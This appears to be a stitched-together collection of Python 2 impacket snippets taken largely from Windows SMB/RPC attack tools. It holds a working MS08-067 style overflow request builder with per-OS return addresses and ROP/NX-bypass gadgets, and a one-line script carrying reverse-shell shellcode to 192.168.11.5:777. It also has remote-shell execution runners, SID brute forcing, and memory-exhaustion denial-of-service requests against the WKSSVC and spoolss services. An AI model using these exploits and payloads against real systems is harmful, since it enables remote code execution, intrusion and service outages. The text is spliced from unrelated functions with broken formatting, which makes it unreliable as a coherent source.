def __DCEPacket(self):
    """Build the request stub for the selected OS profile and open the transport.

    Reads self.os ('1'..'7') to pick a hard-coded, build-specific jump/ROP
    stub, then connects to the target's named pipe and binds the interface.
    Side effects: prints progress, sets self.__trans, self.__dce and
    self.__stub; an unknown self.os value prints a message and calls
    sys.exit(-1).  Names resolved outside this listing: nonxjmper,
    disableNXjumper, generate_rop, shellcode, transport, uuid, sys.

    Defender note: the wire signature is an SMB named-pipe session to
    \\pipe\\browser, a bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
    (SRVSVC) and a request whose UTF-16 path argument carries '\\..\\..\\'
    sequences; the same pipe/interface pair appears in the script in this
    listing that its author labels "MS08_067".  Keeping the service patched
    and monitoring SRVSVC binds over SMB from untrusted hosts are the
    relevant controls.
    """
    if (self.os=='1'):
        print 'Windows XP SP0/SP1 Universal\n'
        ret = "\x61\x13\x00\x01"
        jumper = nonxjmper % (ret, ret)
    elif (self.os=='2'):
        print 'Windows 2000 Universal\n'
        ret = "\xb0\x1c\x1f\x00"
        jumper = nonxjmper % (ret, ret)
    elif (self.os=='3'):
        print 'Windows 2003 SP0 Universal\n'
        ret = "\x9e\x12\x00\x01"  # 0x01 00 12 9e
        jumper = nonxjmper % (ret, ret)
    elif (self.os=='4'):
        print 'Windows 2003 SP1 English\n'
        ret_dec = "\x8c\x56\x90\x7c"  # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
        ret_pop = "\xf4\x7c\xa2\x7c"  # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
        jmp_esp = "\xd3\xfe\x86\x7c"  # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
        disable_nx = "\x13\xe4\x83\x7c"  # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
        jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
    elif (self.os=='5'):
        print 'Windows XP SP3 French (NX)\n'
        ret = "\x07\xf8\x5b\x59"  # 0x59 5b f8 07
        disable_nx = "\xc2\x17\x5c\x59"  # 0x59 5c 17 c2
        jumper = nonxjmper % (disable_nx, ret)  # the nonxjmper also work in this case.
    elif (self.os=='6'):
        print 'Windows XP SP3 English (NX)\n'
        ret = "\x07\xf8\x88\x6f"  # 0x6f 88 f8 07
        disable_nx = "\xc2\x17\x89\x6f"  # 0x6f 89 17 c2
        jumper = nonxjmper % (disable_nx, ret)  # the nonxjmper also work in this case.
    elif (self.os=='7'):
        print 'Windows XP SP3 English (AlwaysOn NX)\n'
        # Gadget offsets keyed by the author's instruction description; consumed by generate_rop().
        rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
        jumper = generate_rop(rvasets)+"AB"  # the nonxjmper also work in this case.
    else:
        print 'Not supported OS version\n'
        sys.exit(-1)
    print '[-]Initiating connection'
    self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
    self.__trans.connect()
    print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
    self.__dce = self.__trans.DCERPC_class(self.__trans)
    self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
    # Hand-assembled request body (UTF-16 path plus fixed header/trailer
    # bytes); the meaning of the individual fixed fields is not derivable
    # from this listing.
    path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
    server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
    prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
    self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"
    return
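def run(self, addr):
    """Open an interactive RemoteShell against *addr* over each configured protocol sequence.

    For every entry in self.__protocols the matching CMDEXEC.KNOWN_PROTOCOLS
    record supplies the string-binding template and port.  In 'SERVER' mode a
    local SMBServer thread is started for the duration of the shell session.

    Fix relative to the original: the except block began with an unconditional
    `raise`, so the `print e` / `sys.stdout.flush()` / `sys.exit(1)` after it
    were dead code, and the server thread was only stopped on the success
    path.  The error is now printed before being re-raised, and the thread is
    stopped in a `finally` clause.

    Args:
        addr: host name or IP address substituted into the binding template.
    Raises:
        whatever RemoteShell or the transport raise; re-raised after printing.
    """
    for protocol in self.__protocols:
        protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
        port = protodef[1]
        print "Trying protocol %s..." % protocol
        print "Creating service %s..." % self.__serviceName
        stringbinding = protodef[0] % addr
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        rpctransport.set_dport(port)
        if hasattr(rpctransport, 'preferred_dialect'):
            rpctransport.preferred_dialect(SMB_DIALECT)
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
        serverThread = None
        try:
            if self.__mode == 'SERVER':
                serverThread = SMBServer()
                serverThread.daemon = True
                serverThread.start()
            self.shell = RemoteShell(self.__share, rpctransport, self.__mode)
            self.shell.cmdloop()
        except Exception, e:
            # Report, then propagate so the caller still sees the failure.
            print e
            sys.stdout.flush()
            raise
        finally:
            # Runs on success, error and KeyboardInterrupt alike, so a started
            # server thread never outlives the shell session.
            if serverThread is not None:
                serverThread.stop()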
def run(self, addr, smbcmd):
    """Execute *smbcmd* on *addr* through SmbExecute and return its output.

    Iterates self.__protocols, but the loop body returns on both the success
    and the error path, so only the first configured protocol is ever
    attempted; an empty self.__protocols returns None implicitly.
    NOTE(review): the except clause also names KeyboardInterrupt, so Ctrl-C
    during execution is printed and turned into an empty result instead of
    aborting the program.

    Args:
        addr: host name or IP address substituted into the binding template.
        smbcmd: command string handed to SmbExecute.execute_remote().
    Returns:
        whatever execute_remote() returned, or "" after a printed exception.
    """
    for protocol in self.__protocols:
        protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol]
        port = protodef[1]
        print "\n\n [*] Trying protocol " + protocol + " on " + addr
        print " [*] Creating service %s..." % self.__serviceName
        stringbinding = protodef[0] % addr
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        rpctransport.set_dport(port)
        if hasattr(rpctransport, 'preferred_dialect'):
            rpctransport.preferred_dialect(SMB_DIALECT)
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
        try:
            # create the object to execute our command
            self.executor = SmbExecute(self.__share, rpctransport, self.__mode, self.__serviceName, self.__outputfile)
            # actually execute the command
            out = self.executor.execute_remote(smbcmd)
            # return the output
            return out
        except (Exception, KeyboardInterrupt), e:
            print e
            sys.stdout.flush()
            return ""
def dump(self, addr):
    """Dumps the list of endpoints registered with the mapper listening at addr.

    Addr is a valid host name or IP address in string format.  The requested
    protocol sequences are tried in order: the first one whose
    self.__fetchList() call succeeds ends the loop, any other exception is
    printed and the next protocol is tried.  Unlike the other protocol loops
    in this listing, set_credentials() receives only username and password.
    NOTE(review): `entries` is assigned but never used in the visible
    portion, which suggests the listing is cut before the output step.
    """
    print 'Retrieving endpoint list from %s' % addr
    # Try all requested protocols until one works.
    entries = []
    for protocol in self.__protocols:
        protodef = RPCDump.KNOWN_PROTOCOLS[protocol]
        port = protodef[1]
        print "Trying protocol %s..." % protocol
        stringbinding = protodef[0] % addr
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        rpctransport.set_dport(port)
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password)
        try:
            entries = self.__fetchList(rpctransport)
        except Exception, e:
            print 'Protocol failed: %s' % e
        else:
            # Got a response. No need for further iterations.
            break
def dump(self, addr):
    """Enumerate SIDs on *addr* by RID brute force, using the configured protocol sequences.

    Builds a transport per entry of self.__protocols, applies
    password/LM/NT credentials where the transport supports it and calls
    self.__bruteForce(rpctransport, self.__maxRid).  The except clause prints
    the failure and then re-raises, so in practice a failing protocol aborts
    the call rather than falling through to the next one; the `else: break`
    only matters on success.
    NOTE(review): `entries` is unused in the visible portion; the listing is
    probably cut before the output step.
    """
    print 'Brute forcing SIDs at %s' % addr
    # Walk the requested protocols; note the re-raise below, so only the
    # first protocol is effectively attempted.
    entries = []
    for protocol in self.__protocols:
        protodef = LSALookupSid.KNOWN_PROTOCOLS[protocol]
        port = protodef[1]
        print "Trying protocol %s..." % protocol
        stringbinding = protodef[0] % addr
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        rpctransport.set_dport(port)
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
        try:
            entries = self.__bruteForce(rpctransport, self.__maxRid)
        except Exception, e:
            print 'Protocol failed: %s' % str(e)
            raise
        else:
            # Got a response. No need for further iterations.
            break
def play(self, addr):
    """Run self.doStuff() against *addr* over the first protocol sequence that does not raise.

    Each entry of self.__protocols maps, via ATSVC_EXEC.KNOWN_PROTOCOLS, to a
    string-binding template and port; credentials are applied only when the
    transport offers set_credentials().  An exception from doStuff() is
    printed and the next protocol is tried; success ends the loop.
    NOTE(review): `entries` is assigned but never used in the visible portion.
    """
    # Try all requested protocols until one works.
    entries = []
    for protocol in self.__protocols:
        protodef = ATSVC_EXEC.KNOWN_PROTOCOLS[protocol]
        port = protodef[1]
        print "Trying protocol %s..." % protocol
        stringbinding = protodef[0] % addr
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        rpctransport.set_dport(port)
        if hasattr(rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
        try:
            self.doStuff(rpctransport)
        except Exception, e:
            print 'Protocol failed: %s' % e
        else:
            # Got a response. No need for further iterations.
            break
def __DCEPacket(self):
    """Connect to the target's \\pipe\\browser named pipe, bind SRVSVC and assemble self.__stub.

    Side effects: prints progress, sets self.__trans and self.__dce, and
    builds self.__stub from fixed header bytes, the module-level `shellcode`
    and `payload` strings (not visible in this listing) and 64 bytes of 'A'
    filler.  The meaning of the fixed fields is not derivable here.

    Defender note: same pipe (\\pipe\\browser) and interface
    (4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0, SRVSVC) as the other SRVSVC
    request builders in this listing; service patch level and SMB exposure
    from untrusted networks are the controls.
    """
    print '[-]Initiating connection'
    self.__trans = transport.DCERPCTransportFactory(
        'ncacn_np:%s[\\pipe\\browser]' % self.target)
    self.__trans.connect()
    print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
    self.__dce = self.__trans.DCERPC_class(self.__trans)
    self.__dce.bind(
        uuid.uuidtup_to_bin(
            ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
    # Constructing the request body: fixed header, shellcode, 64 filler
    # bytes, a second fixed header, payload, then trailer words.
    self.__stub = '\x01\x00\x00\x00'
    self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
    self.__stub += shellcode
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub += '\x00\x00\x00\x00'
    self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
    self.__stub += payload
    self.__stub += '\x00\x00\x00\x00'
    self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
    self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
    self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
    self.__stub += '\x01\x00\x00\x00'
    return
def run(self, addr):
    """Open an interactive RemoteShell against *addr*, once per configured protocol sequence.

    Each protocol name in self.__protocols is looked up in
    CMDEXEC.KNOWN_PROTOCOLS for its string-binding template and port; the
    SMB dialect preference and the credentials are applied only when the
    transport supports them.  Any exception from the shell session is echoed
    in red and the loop moves on to the next protocol.

    Args:
        addr: host name or IP address substituted into the binding template.
    """
    for proto_name in self.__protocols:
        protodef = CMDEXEC.KNOWN_PROTOCOLS[proto_name]
        binding_template, dport = protodef[0], protodef[1]
        color.echo("[*] Trying protocol %s..." % proto_name, GREEN)
        color.echo("[*] Creating service %s..." % self.__serviceName, GREEN)
        rpctransport = transport.DCERPCTransportFactory(binding_template % addr)
        rpctransport.set_dport(dport)
        if hasattr(rpctransport, 'preferred_dialect'):
            rpctransport.preferred_dialect(SMB_DIALECT)
        # set_credentials is offered only by some protocol sequences.
        if hasattr(rpctransport, 'set_credentials'):
            rpctransport.set_credentials(self.__username, self.__password,
                                         self.__domain, self.__lmhash, self.__nthash)
        try:
            self.shell = RemoteShell(self.__share, rpctransport, self.__mode)
            self.shell.cmdloop()
        except Exception, err:
            color.echo("[!] %s" % err, RED)
def main(args):
    """Probe opnums 0..255 of one interface on a remote endpoint and collect the per-opnum outcome.

    Args:
        args: [hostname, port, interface_uuid, version]; any other length
            prints usage and returns 1.
    Each iteration opens a fresh DCERPC connection over ncacn_ip_tcp, binds
    the interface, sends an empty request for opnum i and records "success"
    or the text of the dcerpc.Exception raised by recv().  The connection is
    closed only on that path: an exception from connect(), bind() or call()
    is not caught here and propagates.
    NOTE(review): `resp` is never read, and `results` is built but not
    consumed in the visible portion, so the listing is probably cut after
    the loop.
    """
    if len(args) != 4:
        print "usage: opdump.py hostname port interface version"
        return 1
    host, port, interface, version = args[0], int(args[1]), args[2], args[3]
    stringbinding = "ncacn_ip_tcp:%s" % host
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.set_dport(port)
    results = []
    for i in range(256):
        dce = trans.get_dce_rpc()
        dce.connect()
        iid = uuid.uuidtup_to_bin((interface, version))
        dce.bind(iid)
        dce.call(i, "")
        try:
            resp = dce.recv()
        except dcerpc.Exception, e:
            result = str(e)
        else:
            result = "success"
        dce.disconnect()
        results.append(result)
def __DCEPacket(self):
    """Attempt the SMB named-pipe connection to \\pipe\\browser on self.target.

    On any exception the error is printed together with a "might not be
    vulnerable" hint and control returns to the caller; nothing else happens
    in the visible portion (no bind, no self.__dce).
    """
    print '[-]Initiating connection'
    try:
        self.__trans = transport.DCERPCTransportFactory(
            'ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()
    except Exception, e:
        # Connection failures are reported and swallowed; the caller gets
        # no return value to distinguish them from success.
        print "\n Something went wrong. Might not be vulnerable..\n Printing error: " + str( e) + "\n\n Returning to exploits menu..."
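def setupConnection(self):
    """Build self.trans from self.params and, for SMB transports, install the selected SMB method variants.

    Reads params: proto (index into self.protocols), port, transport_frag,
    tree_connect, open, read, write, smb_user, smb_passwd, smb_lmhash and
    smb_nthash.  Once the transport exists, the SMB-specific section forces
    creation of the SMB object and swaps its tree_connect / nt_create / read
    / write implementations for the variant selected by the integer params
    (read/write value 3 keeps the original under original_*_andx and installs
    the cycling wrapper), then sets the SMB credentials.

    Fix relative to the original: the SMB section ended in
    `except Exception, e: pass`, which hid every failure including bad
    parameter values.  It now prints what was skipped and continues, which is
    presumably the intended best-effort behaviour for protocol sequences that
    have no setup_smb_server().
    """
    proto = int(self.params['proto'])
    self.params['port'] = int(self.params['port'])
    stringbinding = self.protocols[proto] % self.params
    print "Using stringbinding: %r" % stringbinding
    self.trans = transport.DCERPCTransportFactory(stringbinding)
    self.trans.set_max_fragment_size(int(self.params['transport_frag']))
    self.trans.set_dport(self.params['port'])
    try:
        # SMB parameters handling: force building the SMB object so its
        # methods can be replaced below.
        self.trans.setup_smb_server()
        self.smb = self.trans.get_smb_server()
        # tree_connect selection
        arg = int(self.params['tree_connect'])
        if arg == 0:
            self.smb.tree_connect_andx = self.smb.tree_connect
        elif arg == 1:
            self.smb.tree_connect_andx = self.smb.tree_connect_andx
        # open selection
        arg = int(self.params['open'])
        if arg == 0:
            self.smb.nt_create_andx = self.open
        elif arg == 1:
            self.smb.nt_create_andx = self.open_andx
        # read selection
        arg = int(self.params['read'])
        if arg == 0:
            self.smb.read_andx = self.smb.read
        elif arg == 1:
            self.smb.read_andx = self.smb.read_andx
        elif arg == 2:
            self.smb.read_andx = self.smb.read_raw
        elif arg == 3:
            self.smb.original_read_andx = self.smb.read_andx
            self.smb.read_andx = self.read_cycling
        # write selection
        arg = int(self.params['write'])
        if arg == 0:
            self.smb.write_andx = self.smb.write
        elif arg == 1:
            self.smb.write_andx = self.smb.write_andx
        elif arg == 2:
            self.smb.write_andx = self.smb.write_raw
        elif arg == 3:
            self.smb.original_write_andx = self.smb.write_andx
            self.smb.write_andx = self.write_cycling
        # smb credentials
        self.trans.set_credentials(self.params['smb_user'], self.params['smb_passwd'], lm_hash=self.params['smb_lmhash'], nt_hash=self.params['smb_nthash'])
    except Exception, e:
        # Best-effort: transports without an SMB object land here.  Say so
        # instead of hiding parameter errors behind a silent pass.
        print "SMB-specific setup skipped: %s" % e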
def main(args):
    """Enumerate the interfaces a remote endpoint advertises via its management interface and probe each one.

    Usage: ./ifmap.py <host> <port>.  Connects over ncacn_ip_tcp, binds the
    DCERPC management interface (afa8bd80-7d8a-11c9-bef4-08002b102989 v1.0)
    and calls inq_if_ids() for the listed interfaces.  Every listed interface
    plus every entry of the module-level uuid_database is then bound in turn
    on a fresh connection; a bind rejection whose first context item carries
    (Result, Reason) == (2, 1) counts as "not listening", any other bind
    failure propagates.  Interfaces that are listed or listening are printed.

    Returns:
        1 when the argument count is wrong, None otherwise.
    """
    if len(args) != 2:
        print "usage: ./ifmap.py <host> <port>"
        return 1
    host, port = args[0], int(args[1])

    trans = transport.DCERPCTransportFactory("ncacn_ip_tcp:%s" % host)
    trans.set_dport(port)
    dce = trans.get_dce_rpc()
    dce.connect()
    dce.bind(uuid.uuidtup_to_bin(("afa8bd80-7d8a-11c9-bef4-08002b102989", "1.0")))
    ifids = mgmt.DCERPCMgmt(dce).inq_if_ids()
    listed_tups = set()
    for index in range(ifids.get_ifcount()):
        listed_tups.add(uuid.bin_to_uuidtup(ifids.get_if_binuuid(index)))
    dce.disconnect()

    def bind_is_accepted(tup):
        # Reconnect for every probe; a (2, 1) rejection means "not listening".
        dce.connect()
        try:
            dce.bind(uuid.uuidtup_to_bin(tup))
        except dcerpc.Exception, e:
            ack = dcerpc.MSRPCBindAck(str(e.args[1]))
            ctx = ack.getCtxItem(1)
            if (ctx['Result'], ctx['Reason']) != (2, 1):
                raise
            return False
        return True

    listed_uuids = set(uuidstr for uuidstr, ver in listed_tups)
    for tup in sorted(listed_tups | uuid_database):
        listening = bind_is_accepted(tup)
        listed = tup in listed_tups
        if not (listed or listening):
            continue
        if listed:
            listed_text = "listed"
        elif tup[0] in listed_uuids:
            listed_text = "other version listed"
        else:
            listed_text = "not listed"
        listening_text = "listening" if listening else "not listening"
        print "%r: %s, %s" % (tup, listed_text, listening_text)
def test_connection(self):
    """Smoke test: bind the endpoint mapper with username/password credentials, then disconnect."""
    rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
    rpctransport.set_dport(self.dport)
    # Only some protocol sequences carry credentials.
    if hasattr(rpctransport, 'set_credentials'):
        rpctransport.set_credentials(self.username, self.password, self.domain)

    def bound_endpoint_mapper(rpct):
        dce = rpct.get_dce_rpc()
        dce.connect()
        dce.bind(epm.MSRPC_UUID_PORTMAP)
        return dce

    bound_endpoint_mapper(rpctransport).disconnect()
def __connect(self):
    """Open an SMB session to the target's Computer Browser named pipe (\\pipe\\browser).

    Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html
    Raises connectionException when the SMB layer reports a SessionError,
    which the original author attributes to RestrictAnonymous being set to 2.
    """
    binding = 'ncacn_np:%s[\\pipe\\browser]' % self.target
    try:
        self.__trans = transport.DCERPCTransportFactory(binding)
        self.__trans.connect()
    except smb.SessionError:
        raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'
def test_connectionHashes(self):
    """Smoke test: bind the endpoint mapper authenticating with LM/NT hashes instead of a password.

    self.hashes is expected as 'LM:NT'; the split only happens when the
    transport offers set_credentials().
    """
    rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
    rpctransport.set_dport(self.dport)
    if hasattr(rpctransport, 'set_credentials'):
        # Only some protocol sequences carry credentials; password is empty here.
        lm, nt = self.hashes.split(':')
        rpctransport.set_credentials(self.username, '', self.domain, lm, nt)

    def bound_endpoint_mapper(rpct):
        dce = rpct.get_dce_rpc()
        dce.connect()
        dce.bind(epm.MSRPC_UUID_PORTMAP)
        return dce

    bound_endpoint_mapper(rpctransport).disconnect()
def test_dceFragmentation(self):
    """Exercise DCERPC-level fragmentation: enumerate all endpoint-mapper entries with a 1-byte max fragment.

    Credentials come from self.hashes ('LM:NT') with an empty password when
    the transport offers set_credentials(); the DCERPC object is then handed
    the transport's credentials via get_credentials() before connecting.
    """
    rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
    rpctransport.set_dport(self.dport)
    if hasattr(rpctransport, 'set_credentials'):
        # Only some protocol sequences carry credentials.
        lm, nt = self.hashes.split(':')
        rpctransport.set_credentials(self.username, '', self.domain, lm, nt)
    dce = rpctransport.get_dce_rpc()
    dce.set_max_fragment_size(1)
    dce.set_credentials(*(rpctransport.get_credentials()))
    dce.connect()
    dce.bind(epm.MSRPC_UUID_PORTMAP)
    # The lookup result itself is not inspected; the point is that the
    # fragmented exchange completes.
    epm.DCERPCEpm(dce).lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
    dce.disconnect()
def test_packetAnonWINNTPacketPrivacy(self):
    """Enumerate endpoint-mapper entries over an NTLM (WINNT) binding at packet-privacy authentication level.

    Credentials are username/password plus the LM/NT hashes from self.hashes
    ('LM:NT'), applied only when the transport offers set_credentials().
    The auth type and level are set on the DCERPC object after connect() and
    before bind().
    """
    rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
    rpctransport.set_dport(self.dport)
    if hasattr(rpctransport, 'set_credentials'):
        # Only some protocol sequences carry credentials.
        lm, nt = self.hashes.split(':')
        rpctransport.set_credentials(self.username, self.password, self.domain, lm, nt)
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    dce.set_auth_type(dcerpc.RPC_C_AUTHN_WINNT)
    dce.set_auth_level(dcerpc.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
    dce.bind(epm.MSRPC_UUID_PORTMAP)
    # The lookup result itself is not inspected.
    epm.DCERPCEpm(dce).lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS)
    dce.disconnect()
def run(self, addr):
    """Run self.doStuff() against *addr* once for every configured protocol sequence.

    Each protocol name maps, via PSEXEC.KNOWN_PROTOCOLS, to a string-binding
    template and port.  Credentials (password and LM/NT hashes) are applied
    only when the transport offers set_credentials().  Exceptions from
    doStuff() are not caught here.  The SMB dialect preference used by
    sibling run() methods is not applied (the author had it commented out).

    Args:
        addr: host name or IP address substituted into the binding template.
    """
    for proto_name in self.__protocols:
        record = PSEXEC.KNOWN_PROTOCOLS[proto_name]
        binding_template, dport = record[0], record[1]
        print "Trying protocol %s...\n" % proto_name
        rpctransport = transport.DCERPCTransportFactory(binding_template % addr)
        rpctransport.set_dport(dport)
        # set_credentials is offered only by some protocol sequences.
        if hasattr(rpctransport, 'set_credentials'):
            rpctransport.set_credentials(self.__username, self.__password,
                                         self.__domain, self.__lmhash, self.__nthash)
        self.doStuff(rpctransport)
def run(self):
    """Build a NetrWkstaUserEnum request with a multi-megabyte max_len and open a NULL-session transport to it.

    The request targets interface 6bffd098-a112-3610-9833-46c3f87e345a v1.0
    (WKSSVC) over \\pipe\\browser on self.target; query['max_len'] is
    self.memorySize MiB (the wizard prompt suggests 1024 as the default, but
    the default itself is set elsewhere).  The visible portion ends after the
    connect attempt, which returns False on any exception; sending the
    request presumably happens further down and is not shown.  Names
    resolved outside this listing: NetrWkstaUserEnum, B1, utf16, transport,
    raw_input, self.gom.

    Defender note: the observable is an anonymous (NULL-session) named-pipe
    connection followed by a WKSSVC enumeration whose max_len is in the
    megabytes, which the surrounding messages treat as a memory-exhaustion
    attempt.  Restricting anonymous access (RestrictAnonymous) and SMB
    exposure from untrusted hosts are the relevant controls.
    """
    self.gom.echo()
    self.gom.echo("Trying to exploit ...")
    self.gom.echo()
    pipe = 'browser'
    UUID = ('6bffd098-a112-3610-9833-46c3f87e345a', '1.0')
    host = self.target
    stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
    stringbinding %= {'host': host, 'pipe': pipe}
    MB = 1024 * 1024
    if self.wizard:
        # Interactive override of the size in MiB; empty input keeps the current value.
        res = raw_input("Memory size [1024]: ")
        if res != "":
            self.memorySize = int(res)
    memory_size = MB * self.memorySize
    query = NetrWkstaUserEnum()
    server = "%s\x00" % (host)
    query['server'] = B1()
    query['server']['id'] = 0x41414141
    query['server']['actual'] = len(server)
    query['server']['max'] = len(server)
    query['server']['str'] = utf16(server)
    query['max_len'] = memory_size
    trans = transport.DCERPCTransportFactory(stringbinding)
    self.gom.echo("[*] Connecting to %s:445 (NULL Session)" % (self.target))
    try:
        trans.connect()
    except Exception, err:
        self.gom.echo("[-] %s" % (err))
        return False
from impacket.dcerpc import transport import sys #################################### # MS08_067 case of study by ly0n # Greetz: muts,ryujin & offsec team #################################### try: target = sys.argv[1] port = 445 except IndexError: print "Usage: program host" sys.exit() trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target) trans.connect() dce = trans.DCERPC_class(trans) dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) # revere shell 192.168.11.5 port 777 by msfpayload payload = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f"
def run(self):
    """Open the spoolss named pipe on self.target and request a printer value with a very large 'offered' size.

    Flow: optional wizard prompt for the size in MiB, connect to
    \\pipe\\spoolss and bind 12345678-1234-abcd-ef00-0123456789ab v1.0,
    OpenPrinterEx for the host's UNC name with a fixed client name and a
    placeholder user, then GetPrinterData on the returned handle with
    query['offered'] = memory_size.  Returns False when the connection or
    OpenPrinterEx fails (error codes 0x709 / 0x5 are reported by name), True
    when the reply's first four status bytes match the author's
    "out of memory" pattern, otherwise None.  A NetBIOSTimeout on the final
    recv() is also reported as the target running out of memory.  Names
    resolved outside this listing: OpenPrinterEx, GetPrinterData, B1, B2,
    pack, NetBIOSTimeout, transport, uuid, raw_input, self.gom.

    Defender note: the observable is a spoolss pipe session followed by a
    GetPrinterData request whose offered buffer size is in the megabytes,
    which this code expects to exhaust memory on the print service; limiting
    spooler exposure over SMB and alerting on oversized spoolss requests are
    the relevant controls.
    NOTE(review): the bare `except:` around trans.connect() also swallows
    KeyboardInterrupt.
    """
    self.gom.echo()
    self.gom.echo("Trying to exploit ...")
    self.gom.echo()
    MB = 1024 * 1024
    host = self.target
    if self.wizard:
        # Interactive override of the size in MiB; empty input keeps the current value.
        res = raw_input("Memory size [1024]: ")
        if res != "":
            self.memorySize = int(res)
    memory_size = MB * self.memorySize
    interface = ('spoolss', '12345678-1234-abcd-ef00-0123456789ab', '1.0')
    stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
    stringbinding %= {
        'host': host,
        'pipe': interface[0],
    }
    trans = transport.DCERPCTransportFactory(stringbinding)
    self.gom.echo("[*] Connecting to %s:445" % (host))
    try:
        trans.connect()
    except:
        self.gom.echo("[-] Connect failed")
        return False
    self.gom.echo("[+] Connected")
    dce = trans.DCERPC_class(trans)
    dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2])))
